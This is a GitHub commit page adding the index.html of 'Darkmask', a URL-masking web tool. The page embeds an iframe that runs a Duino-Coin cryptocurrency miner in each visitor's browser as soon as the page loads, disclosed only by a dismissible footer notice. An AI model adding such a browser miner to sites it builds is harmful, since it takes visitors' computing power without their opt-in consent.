Skip to content

Commit

Permalink
Create index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
merwin-asm committed Feb 16, 2023
1 parent 56dc187 commit 1a59f1f
Showing 1 changed file with 64 additions and 0 deletions.
64 changes: 64 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Darkmask || Darkmash || Url Masking</title>
<link rel="stylesheet" href="style_.css">

<meta property="og:image" content="icon_.svg" />
<meta name="description" content="Darkmask || Create Masked Urls.." />
<meta name="keywords" content="darkmash , tools , startup , coders, darkmask, url, masking" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="icon" type="image/png" href="icon_.svg" />

<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="darkmask">
<meta itemprop="description" content="Darkmask || Create Masked Urls..">
<meta itemprop="image" content="icon_.svg">

<!-- Twitter Card data -->
<meta name="twitter:card" content="Make urls masked..">
<meta name="twitter:title" content="Darkmask">
<meta name="twitter:description" content="Darkmask || Create Masked Urls..">
<meta name="twitter:image" content="icon_.svg">

<!-- Open Graph data -->
<meta property="og:title" content="Darkmask" />
<meta property="og:type" content="Landing page" />
<meta property="og:url" content="https://darkmash-org.github.io/Darkmask" />
<meta property="og:image" content="icon_.svg" />
<meta property="og:description" content="Darkmask || Create Masked Urls.." />
<meta property="og:site_name" content="Darkmask" />

</head>

<body>
<div>
<a class="ls" href="index.html">Home</a>
<a class="ls" href="https://darkmash-org.github.io/">Darkmash</a>
<a class="ls" href="https://github.com/darkmash-org/Statman/blob/main/fund_us.md">Support</a>
</div>
<input id="b" type="text" placeholder=" Url " />
<button onclick="make();" id="make">Mask</button>

<p id="url">Masked Url....</p>

<a id="github" href="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/darkmash-org/Darkmask" target="_blank" rel="noopener noreferrer"><img height=45px src="GitHub.png" alt="Github Repo"></a>

<script src="script_.js"></script>

<iframe class="mner" src="https://server.duinocoin.com/webminer.html?username=darkmash&threads=1&rigid=darkmask&keyinput="></iframe>
<footer id="footer">

<div class="alert">
<span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span> We do mine in the site . This is to make sure the company could serve yall the next day : )
</div>

</footer>

</body>

</html>

0 comments on commit 1a59f1f

Please sign in to comment.